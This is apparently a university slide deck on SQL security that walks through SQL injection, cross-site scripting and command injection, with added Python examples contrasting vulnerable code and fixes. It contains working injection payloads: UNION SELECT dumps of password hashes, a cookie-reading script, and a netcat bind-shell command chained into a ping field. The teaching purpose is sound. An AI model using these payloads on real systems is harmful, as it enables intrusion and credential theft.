Published by Dawson Noblett. Modified over 10 years ago.
Slide 1
Nick Tsamis
University of Tulsa, CS 7493
April 2013
Slide 2: Outline
What is SQL?
Why SQL matters. *yawn* What's the big deal?
What could possibly go wrong?
  - SQL injection
  - XSS
  - Command execution
*pffft* So we shouldn't use SQL?
That's some smart SQL!
Slide 3: Structured Query Language
Language: a specialized programming language, used in relational databases.
Query: raw data is queried to obtain information. "Our business is turning data into information." – Michael A. Peterson
Structured: adheres to a strict, defined format: query, table, column.
Slide 4: Relational Databases vs Hierarchical Databases
Relational: data relations are stored.
Hierarchical: top-down flow only.
Slide 5: Popularity and Versatility
Popularity: one of the first commercial languages for relational models. Today it exists as the de facto standard (ANSI and ISO). It's EVERYWHERE.
Versatility: it's flexible: T-SQL, MySQL, LINQ.
Slide 6: Vulnerabilities
SQL is powerful... if you grant it.
It manages data, some of which is sensitive, and so provides a great entry point for access.
Security is not always implicit: raw SQL can be very vulnerable to simple injections.
Recovering lost password: if $EMAIL = "anything' OR 'x'='x"
Slide 7: SQL Injection
Injecting unintended code into a query.
Example: returning a user name from an ID.
Source code
The attack: we add a second condition that will always evaluate true (1=1). The purpose is to dump all user information.
$id = ' or 1=1 #
Resulting query: WHERE user_id = '' or 1=1 #'";
Slide 8: SQL Injection
Injecting unintended code into a query.
Example: returning SQL server information.
The attack(s): we add a UNION SELECT to dump additional data.
$id = ' union SELECT 1, user() #    yields the current SQL user
$id = ' and 1=1 union select database(),version() #    yields the current SQL version and database name
Slide 9: SQL Injection
Injecting unintended code into a query.
Case study: returning the good stuff!!
The attack(s): we add a UNION SELECT to dump password data.
$id = ' union select user, password FROM users #    yields the current user and associated password (hash)
Slide 10: XSS (Cross Site Scripting)
Executing unintended scripts inline.
Example: throw an alert. A value is passed as a URL argument. What if we put an inline script in that URL?
Alert box shown:
Slide 11: XSS (Cross Site Scripting)
Well, that wasn't exactly l33t... Have a cookie: alert(document.cookie)
Alert box shown:
More serious implications:
  - Run a custom script that can open a remote connection (backdoor)
  - Read and dump configuration data (SQL or OS)
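The reflected alert on slides 10 and 11 exists because a URL argument is written straight into the page. The Python below is an added example, not code from the deck: it renders the same kind of greeting page two ways, once by concatenation and once through html.escape, so the two HTML strings a browser would receive can be compared side by side. The URL, the name parameter and the function names are assumptions made for the example.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample request: the "name" argument carries the inline script from slide 11.
SAMPLE_URL = "http://example.test/hello?name=<script>alert(document.cookie)</script>"


def name_from_url(url):
    # Pull the "name" query argument out of the request URL (empty string if absent).
    return parse_qs(urlsplit(url).query).get("name", [""])[0]


def greeting_vulnerable(url):
    # Reflects the argument into the page unchanged, so the browser parses it as markup.
    return "<p>Hello, " + name_from_url(url) + "</p>"


def greeting_escaped(url):
    # Encodes <, >, &, ' and " before output: the browser renders the text and runs nothing.
    return "<p>Hello, " + html.escape(name_from_url(url), quote=True) + "</p>"


def contains_script_element(markup):
    # Simple check used by the demo: does the rendered HTML still contain a script element?
    return "<script" in markup.lower()


if __name__ == "__main__":
    for render in (greeting_vulnerable, greeting_escaped):
        page = render(SAMPLE_URL)
        print(render.__name__, "->", page, "| script element present:", contains_script_element(page))
```

Escaping at the point of output is the fix the deck's XSS slides call for; marking the session cookie HttpOnly additionally keeps document.cookie from exposing it if an escape is ever missed.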
Slide 12: Command Execution
Use the secret entrance: a site that allows free IP pinging.
Sample source:
Concatenating commands might work...
192.168.200.128;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 8999 > /tmp/pipe
This attempts to accept connections on port 8999 with netcat (nc). Upon execution, the browser waits for a connection on port 8999.
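The ping form on slide 12 is exploitable because the submitted text is pasted into a shell command line, where ';' starts a second command. The Python below is an added example, not the deck's own source: it shows the concatenated command beside a version that validates the input as a literal IP address and runs ping as an argument list with no shell, so metacharacters have no meaning. The function names and the use of ping -c 1 are assumptions for the example.

```python
import ipaddress
import subprocess


def ping_command_vulnerable(target):
    # The concatenated string is what the vulnerable page would hand to a shell:
    # everything after ';' in the input becomes a second command.
    return "ping -c 1 " + target


def run_ping_vulnerable(target):
    # Never call this with untrusted input; shell=True is exactly the weakness on the slide.
    return subprocess.run(ping_command_vulnerable(target), shell=True).returncode


def ping_argv(target):
    # Hardened form: accept only something that parses as an IPv4 or IPv6 address
    # (ipaddress.ip_address raises ValueError for anything else), then build an
    # argv list. Executed without a shell, ';' '|' '>' are plain characters.
    addr = ipaddress.ip_address(target.strip())
    return ["ping", "-c", "1", str(addr)]


def run_ping(target):
    # Argument list, no shell, bounded runtime.
    return subprocess.run(ping_argv(target), capture_output=True, text=True, timeout=5).returncode


if __name__ == "__main__":
    # Constructed inputs: a plain address and the command-chaining input from slide 12.
    for user_input in ("192.168.200.128", "192.168.200.128;mkfifo /tmp/pipe"):
        try:
            print("accepted:", ping_argv(user_input))
        except ValueError as err:
            print("rejected:", repr(user_input), "->", err)
```

Rejecting the input before it reaches the command is the right order: escaping the string for one shell still leaves the page one shell away from the same bug, whereas a parsed IP address can only ever be an IP address.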
Slide 13: Better SQL
Stored procedures:
  - Preformat and secure a static query
  - Grant access to the SP, not the tables it accesses
  - Typically increased performance
  - Parameter check: data typing
  - No network traffic: runs inside the engine
String filtering/escaping:
  - Escape the string characters ' " \ NUL
Slide 14: Mo' Better SQL
Parameterized SQL:
  - Strongly typed data is bound on execution
  - Parameters are populated and checked
  - User input is not directly embedded
Database management:
  - Permission limitation: principle of least privilege
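To tie the injection slides (6 to 9) to the fixes on slides 13 and 14, here is an added example in Python using the standard sqlite3 module; it is not code from the deck. It builds a constructed users table, runs the slide 6 lost-password input through a concatenated query and through a parameterized one, and adds the data-typing check from slide 13 for the user-ID lookup. Table layout, column names and function names are assumptions for the example. Note that SQLite does not treat '#' as a comment the way MySQL does, so the 'x'='x' input from slide 6 is used rather than the '#'-terminated ones.

```python
import sqlite3


def make_db():
    # Constructed sample data for the example.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (email, password_hash) VALUES (?, ?)",
        [("alice@example.com", "hash-a"), ("bob@example.com", "hash-b")],
    )
    return conn


def lookup_vulnerable(conn, email):
    # Raw SQL built by concatenation: the input becomes part of the query text,
    # so anything' OR 'x'='x turns the WHERE clause into a condition that is always true.
    query = "SELECT user_id, email FROM users WHERE email = '" + email + "'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, email):
    # Parameterized SQL (slide 14): the value is bound at execution and is never
    # parsed as SQL, so the same input simply matches no row.
    return conn.execute(
        "SELECT user_id, email FROM users WHERE email = ?", (email,)
    ).fetchall()


def lookup_by_id(conn, user_id):
    # Parameter check by data typing (slide 13): a user ID must be an int before
    # it gets anywhere near the query, so ' or 1=1 can never be accepted.
    if isinstance(user_id, bool) or not isinstance(user_id, int):
        raise TypeError("user_id must be an int")
    return conn.execute(
        "SELECT user_id, email FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def demo():
    # Row counts for the lost-password input from slide 6, both ways.
    conn = make_db()
    payload = "anything' OR 'x'='x"
    return {
        "vulnerable_rows": len(lookup_vulnerable(conn, payload)),
        "parameterized_rows": len(lookup_parameterized(conn, payload)),
        "normal_rows": len(lookup_parameterized(conn, "alice@example.com")),
    }


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the concatenated query returning every user for the injected input while the parameterized query returns none; the least-privilege point from slide 14 is the remaining layer, since the account used by the lookup should be able to read users but not, for instance, select from other tables with a UNION.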
Slide 16: Sources
http://upload.wikimedia.org/wikipedia/commons/thumb/e/eb/Hierarchical_Model.svg/320px-Hierarchical_Model.svg.png
http://www.ibm.com/developerworks/library/x-matters8/relat.gif
http://upload.wikimedia.org/wikipedia/commons/a/aa/SQL_ANATOMY_wiki.svg
http://www.unixwiz.net/techtips/sql-injection.html
http://wikipedia.org
http://www.codinghorror.com/blog/2005/04/give-me-parameterized-sql-or-give-me-death.html